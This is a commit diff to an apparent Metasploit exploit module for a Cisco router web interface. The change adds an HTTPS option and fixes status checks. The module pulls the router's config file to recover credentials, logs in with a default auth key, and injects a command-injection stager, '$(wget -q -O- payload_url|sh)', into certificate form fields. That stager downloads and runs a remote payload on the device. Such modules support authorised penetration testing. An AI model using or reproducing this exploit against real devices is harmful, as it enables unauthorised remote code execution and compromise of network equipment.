Checked the functionality of module. Added ability to connect via HTTPS.
parent
0551f3df3c
commit
1e00c28701
|
@ -58,8 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
register_options([
|
register_options([
|
||||||
Opt::RPORT(8007), # port of Cisco webinterface
|
Opt::RPORT(8007), # port of Cisco webinterface
|
||||||
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
|
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
|
||||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
|
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
|
||||||
|
OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
|
||||||
])
|
])
|
||||||
|
deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
|
||||||
end
|
end
|
||||||
|
|
||||||
def execute_command(cmd, opts = {})
|
def execute_command(cmd, opts = {})
|
||||||
|
@ -79,13 +81,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def primer
|
def primer
|
||||||
payload_url = get_uri
|
payload_url = get_uri
|
||||||
print_status("Downloading configuration from #{peer}")
|
print_status("Downloading configuration from #{peer}")
|
||||||
res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
|
if(datastore['USE_SSL'])
|
||||||
|
print_status("Using SSL connection to router.")
|
||||||
|
end
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => normalize_uri("cgi-bin","config.exp"),
|
||||||
|
'SSL' => datastore['USE_SSL']
|
||||||
|
})
|
||||||
unless res
|
unless res
|
||||||
vprint_error('Connection failed.')
|
vprint_error('Connection failed.')
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
unless res.status == 200
|
unless res.code == 200
|
||||||
vprint_error('Could not download config. Aborting.')
|
vprint_error('Could not download config. Aborting.')
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
@ -99,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
print_status("Using default auth_key #{authkey}")
|
print_status("Using default auth_key #{authkey}")
|
||||||
res2 = send_request_cgi({
|
res2 = send_request_cgi({
|
||||||
'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
|
'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
|
||||||
|
'SSL' => datastore['USE_SSL'],
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch¤t_password=&new_password=&re_new_password="
|
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch¤t_password=&new_password=&re_new_password="
|
||||||
})
|
})
|
||||||
|
@ -108,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
unless res.status == 200
|
unless res.code == 200
|
||||||
vprint_error('Login failed with downloaded credentials. Aborting.')
|
vprint_error('Login failed with downloaded credentials. Aborting.')
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
@ -120,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
print_status("Sending payload. Staging via #{payload_url}.")
|
print_status("Sending payload. Staging via #{payload_url}.")
|
||||||
#Build staging command
|
#Build staging command
|
||||||
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
|
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
|
||||||
if(command_string.length <= 50)
|
if(command_string.length <= 63)
|
||||||
print_status("Staging command length looks good. Sending exploit!")
|
print_status("Staging command length looks good. Sending exploit!")
|
||||||
else
|
else
|
||||||
vprint_error("Warning: Staging command length probably too long. Trying anyway...")
|
vprint_error("Warning: Staging command length probably too long. Trying anyway...")
|
||||||
|
@ -128,6 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
res3 = send_request_cgi({
|
res3 = send_request_cgi({
|
||||||
'uri' => normalize_uri("certificate_handle2.htm"),
|
'uri' => normalize_uri("certificate_handle2.htm"),
|
||||||
|
'SSL' => datastore['USE_SSL'],
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'cookie' => cookies,
|
'cookie' => cookies,
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
|
@ -140,10 +150,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'submitStatus' => '1',
|
'submitStatus' => '1',
|
||||||
'log_ch' => '1',
|
'log_ch' => '1',
|
||||||
'type' => '4',
|
'type' => '4',
|
||||||
'Country' => 'US',
|
'Country' => 'A',
|
||||||
'state' => 'CA',
|
'state' => 'A',
|
||||||
'locality' => 'DC',
|
'locality' => 'A',
|
||||||
'organization' => 'cc',
|
'organization' => 'A',
|
||||||
'organization_unit' => 'A',
|
'organization_unit' => 'A',
|
||||||
'email' => 'any@example.com',
|
'email' => 'any@example.com',
|
||||||
'KeySize' => '512',
|
'KeySize' => '512',
|
||||||
|
|
Loading…
Reference in New Issue